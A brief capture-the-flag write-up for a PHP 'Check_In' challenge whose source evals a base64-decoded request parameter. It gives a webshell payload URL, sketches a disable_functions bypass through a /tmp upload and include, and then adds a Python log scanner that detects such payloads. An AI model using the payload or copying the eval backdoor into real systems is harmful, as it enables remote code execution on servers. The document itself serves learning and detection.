
Check_In

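<title>Check_In</title>
<?php
highlight_file(__FILE__);
class ClassName
{
    public $code = null;
    public $decode = null;
    function __construct()
    {
        // Client-controlled input: $_REQUEST carries GET/POST (and, depending on request_order, cookie) parameters
        $this->code = @$this->x()['Ginkgo'];
        $this->decode = @base64_decode( $this->code );
        // The base64-decoded parameter is executed as PHP code
        @Eval($this->decode);
    }
    public function x()
    {
        return $_REQUEST;
    }
}
new ClassName();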
One-line webshell
url?Ginkgo=ZXZhbCgkX1BPU1RbJ29hdG1lYWwnXSk7
To run /readflag, disable_functions has to be bypassed: upload a file to the /tmp/ directory and then include it.
https://github.com/mm0r1/exploits
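
Seen from the server side, the request above is a query parameter whose base64 value decodes to PHP code. The following added example (not part of the original write-up) scans access-log lines for such parameters; the log lines are constructed, and only the Ginkgo value is taken from this page.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# PHP constructs that should never arrive base64-wrapped in a parameter.
PHP_CODE = re.compile(
    rb"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|"
    rb"include|require)\s*\(|\$_(POST|GET|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)
B64_SHAPE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
REQUEST_TARGET = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def decode_b64(value):
    """Return the decoded bytes if value is well-formed base64, else None."""
    value = value.replace(" ", "+")  # parse_qsl turns a literal '+' into ' '
    if not B64_SHAPE.fullmatch(value):
        return None
    try:
        return base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def scan_request(target):
    """Return (parameter, decoded text) for values that decode to PHP code."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = decode_b64(value)
        if decoded and PHP_CODE.search(decoded):
            hits.append((name, decoded.decode("utf-8", "replace")))
    return hits

def scan_log(lines):
    """Map each flagged access-log line number to its hits."""
    flagged = {}
    for number, line in enumerate(lines, 1):
        match = REQUEST_TARGET.search(line)
        hits = scan_request(match.group(1)) if match else []
        if hits:
            flagged[number] = hits
    return flagged

# Constructed sample log lines; only the Ginkgo value comes from the write-up.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /?page=about HTTP/1.1" 200 812',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /dl?token=aGVsbG8gd29ybGQgZnJvbSBhIHVzZXI= HTTP/1.1" 200 90',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "POST /?Ginkgo=ZXZhbCgkX1BPU1RbJ29hdG1lYWwnXSk7 HTTP/1.1" 200 4096',
]
```

Because the challenge reads `$_REQUEST`, the same parameter can also arrive in a POST body or cookie, which standard access logs do not record. Covering those paths needs request-body inspection at a WAF or in application logging.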